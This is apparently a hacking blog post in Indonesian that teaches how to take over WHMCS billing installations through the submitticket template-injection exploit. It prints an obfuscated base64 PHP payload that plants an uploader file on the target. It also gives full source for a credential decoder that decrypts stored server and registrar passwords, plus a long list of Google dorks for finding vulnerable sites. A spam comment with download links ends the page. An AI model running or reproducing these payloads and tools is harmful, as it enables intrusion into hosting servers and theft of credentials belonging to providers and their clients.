Hack cPanel WHMCS

Diposting oleh RhyTlineRz Label: Hacker

ane mau share video cupu
bagaimana seseorang mengambil alih cpanel whmcs + all client + indexing

tutor ini msh menggunakan exploit submitticket .

Bahan :
exploit .

{php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEo

xMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1

EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFo
yVW5YVnNuYm1GdFpTZGR
PdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcG
JXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcG

JXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdU
pIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0F
nSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb
0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1R

WIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS
1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUd
GamRHbHZiajBpSWlC
bGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1s

c1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxO

MVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRm
aWN
oaWVyID0gZm9wZW4oJ2Rvd25sb2Fkcy9pbmRleHgucGhwJywndycpOw0KZndyaXRlKCRmaWNoaWV
yLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw=='));exit;{/php}

Untuk decode passwordnya :

<?php###########################################
#      WHMCS Server Password decoder
#                                                        
#          frozen.hearts@yahoo.com        
#Note : I'm Proud to be ~~Pakistan~~  
###########################################function decrypt ($string,$cc_encryption_hash)
{
    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
    $hash_key = _hash ($key);
    $hash_length = strlen ($hash_key);
    $string = base64_decode ($string);
    $tmp_iv = substr ($string, 0, $hash_length);
    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
    $iv = $out = '';
    $c = 0;
    while ($c < $hash_length)
    {
        $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
        ++$c;
    }
    $key = $iv;
    $c = 0;
    while ($c < strlen ($string))
    {
        if (($c != 0 AND $c % $hash_length == 0))
        {
            $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
        }
        $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
        ++$c;
    }
    return $out;
}

function _hash ($string)
{
    if (function_exists ('sha1'))
    {
        $hash = sha1 ($string);
    }
    else
    {
        $hash = md5 ($string);
    }
    $out = '';
    $c = 0;
    while ($c < strlen ($hash))
    {
        $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
        $c += 2;
    }
    return $out;
}
 if($_POST['form_action'] == 1 )
 {
 //include($file);
 $file=($_POST['file']);$text=file_get_contents($file);$text= str_replace("<?php", "", $text);$text= str_replace("<?", "", $text);$text= str_replace("?>", "", $text);
eval($text);
    $link=mysql_connect($db_host,$db_username,$db_password) ;
        mysql_select_db($db_name,$link) ;$query = mysql_query("SELECT * FROM tblservers");
while($v = mysql_fetch_array($query)) {$ipaddress = $v['ipaddress'];$username = $v['username'];$type = $v['type'];$active = $v['active'];$hostname = $v['hostname'];
echo("<center><table border='1'>");$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>Username</td><td>$username</td></tr>");
echo("<tr><td>Password</td><td>$password</td></tr>");

echo "</table><br><br></center>";
}
    $link=mysql_connect($db_host,$db_username,$db_password) ;
        mysql_select_db($db_name,$link) ;$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table border='1'>");
echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {$registrar     = $v['registrar'];$setting = $v['setting'];$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {$value=0;
}$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");




}
echo "</table><br><br></center>";
}


 if($_POST['form_action'] == 2 )
 {
 //include($file);
 $db_host=($_POST['db_host']);
 $db_username=($_POST['db_username']);
 $db_password=($_POST['db_password']);
 $db_name=($_POST['db_name']);
 $cc_encryption_hash=($_POST['cc_encryption_hash']);



    $link=mysql_connect($db_host,$db_username,$db_password) ;
        mysql_select_db($db_name,$link) ;$query = mysql_query("SELECT * FROM tblservers");
while($v = mysql_fetch_array($query)) {$ipaddress = $v['ipaddress'];$username = $v['username'];$type = $v['type'];$active = $v['active'];$hostname = $v['hostname'];
echo("<center><table border='1'>");$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>Username</td><td>$username</td></tr>");
echo("<tr><td>Password</td><td>$password</td></tr>");

echo "</table><br><br></center>";
}

    $link=mysql_connect($db_host,$db_username,$db_password) ;
        mysql_select_db($db_name,$link) ;$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table border='1'>");
echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {$registrar     = $v['registrar'];$setting = $v['setting'];$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {$value=0;
}$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");




}
echo "</table><br><br></center>";
}
?><body bgcolor="#000000">
 <style>
BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive;   color: white;}
textarea{background-color:#191919;color:red;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1px solid #666666;}
input{FONT-WEIGHT:normal;background-color: #191919;font-size: 13px;font-weight:bold;color: red; font-family: Tahoma; border: 1px solid #666666;height:17}
</style>
<center>
<font color="#FFFF6FF" size='+3'>[ ~~ WHMCS Server Password decoder ~~ ]</font><br><br>
<font color="#0066FF" size='+2'>Symlink to configuration.php of WHMCS</font><br>
</center>
<FORM action=""  method="post">
<input type="hidden" name="form_action" value="1">
<br>
 <input type="text" size="30" name="file" value="">
<br>
<INPUT class=submit type="submit" value="Submit" name="Submit">
</FORM>
<hr>
<br>
<center>
<font color="#0066FF" size='+2'>DB configuration of WHMCS</font><br>
</center>
<FORM action=""  method="post">
<input type="hidden" name="form_action" value="2">
<br>
<table border=1>
<tr><td>db_host </td><td><input type="text" size="30" name="db_host" value="localhost"></td></tr>
<tr><td>db_username </td><td><input type="text" size="30" name="db_username" value=""></td></tr>
<tr><td>db_password</td><td><input type="text" size="30" name="db_password" value=""></td></tr>
<tr><td>db_name</td><td><input type="text" size="30" name="db_name" value=""><td></tr>
<tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>
</table>
<br>
<INPUT class=submit type="submit" value="Submit" name="Submit">
</FORM>
<hr>
<center>
<font color="#0066FF" size='+2'>Password decoder</font><br>
<?
 if($_POST['form_action'] == 3 )
 {


 $password=($_POST['password']);
 $cc_encryption_hash=($_POST['cc_encryption_hash']);$password = decrypt ($password, $cc_encryption_hash);
echo("Password is ".$password);
}?></center>
<FORM action=""  method="post">
<input type="hidden" name="form_action" value="3">
<br>
<table border=1>
<tr><td>Password</td><td><input type="text" size="30" name="password" value=""></td></tr>
<tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>
</table>
<br>
<INPUT class=submit type="submit" value="Submit" name="Submit">
</FORM>

Dork :

1. inurl:whmcs/cart.php?a=



    2. inurl:billing/cart.php?a=





    intext:Powered by WHMCompleteSolution inurl:submitticket.php

    intext:Powered by WHMCompleteSolution inurl:clients/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:client/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:crm/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:cp/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:manage/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:member/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:members/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:billing/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:billings/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:support/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:help/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:secure/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:store/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:log/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:orders/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:order/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:portal/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:mc/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:office/submitticket.php

    intext:Powered by WHMCompleteSolution inurl:submitticket.php site:com

    intext:Powered by WHMCompleteSolution inurl:submitticket.php site:org

    intext:Powered by WHMCompleteSolution inurl:submitticket.php site:net

    intext:Powered by WHMCompleteSolution inurl:submitticket.php site:info

    intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"

    intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"

1 komentar:

Anonim23 Maret 2022 pukul 01.34
Hack Cpanel Whmcs >>>>> Download Now

>>>>> Download Full

Hack Cpanel Whmcs >>>>> Download LINK

>>>>> Download Now

Hack Cpanel Whmcs >>>>> Download Full

>>>>> Download LINK
BalasHapus
Balasan

Tambahkan komentar

RhyTlineRz

Hack cPanel WHMCS

1 komentar:

Labels

Blog Archive

Labels

Popular Posts

Followers